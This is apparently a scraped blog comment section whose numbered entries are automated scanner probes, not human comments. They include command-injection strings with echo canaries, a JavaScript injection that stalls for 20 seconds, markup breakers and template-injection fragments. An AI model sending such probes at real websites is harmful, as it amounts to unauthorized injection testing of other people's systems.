  1102. |echo wryqqgoesk gyjsh8hvoq||a #’ |echo wryqqgoesk gyjsh8hvoq||a #|” |echo wryqqgoesk gyjsh8hvoq||a #


  1103. ]]>><


  1104. ‘+(function(){if(typeof tyx1r===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);tyx1r=1;}}())+'


  1105. “–>’–>`–>


  1106. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  1107. ztlw6t16`z’z”${{%{{\


  1108. urk15v1l64\z`z’z”${{%{{\


  1109. nvkur701


  1110. lpe3jn55z3ghq39b0qmln0w5ww2pqfe76vyio6d

Leave a Reply

Your email address will not be published. Required fields are marked *